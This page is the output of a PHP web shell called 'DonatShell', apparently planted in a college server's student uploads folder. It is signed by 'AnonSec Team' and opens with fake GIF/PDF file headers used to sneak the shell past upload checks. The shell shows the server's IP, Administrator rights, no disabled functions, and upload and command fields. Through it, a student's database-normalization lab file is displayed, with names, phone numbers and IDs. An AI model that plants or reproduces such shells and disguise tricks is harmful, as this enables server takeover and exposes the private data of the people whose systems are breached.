GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/uploads/20253/CST1600/41/16347786/Lab07/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/uploads/20253/CST1600/41/16347786/Lab07/CST1600_NaomiSchmitz_Lab07.txt
UNF:
student(Name, HomeMobilePhoneNumbers, StudentID, MajorCode1, MajorCode2, MajorCode3)

1NF: there could be 2 phone numbers so you need to separate them

student(*StudentID, Name, HomePhoneNumber, MobilePhoneNumber, MajorCode1, MajorCode2, MajorCode3)

2NF: students can have multiple majors

student(*StudentID, Name, HomePhoneNumber, MobilePhoneNumber)
student_major(*StudentID, *MajorCode)

3NF: incase a student gets deleted we don't want the major code deleted so we put it in different table

student(*StudentID, Name, HomePhoneNumber, MobilePhoneNumber)
student_major(*StudentID, *MajorCode)
major(*MajorCode, MajorName)


Three data rows:

Name	HomeMobilePhoneNumbers	studentID	MajorCode1	MajorCode2	MajorCode3
Avram Hinton	103-391-7811;676-683-6301	34673656	NSA	CSS	CST
Hayes Gibson	447-149-5334	83681840	CST	
Kristen Acosta	;972-658-1570	94086534	CP	MAD

Anon7 - 2022
AnonSec Team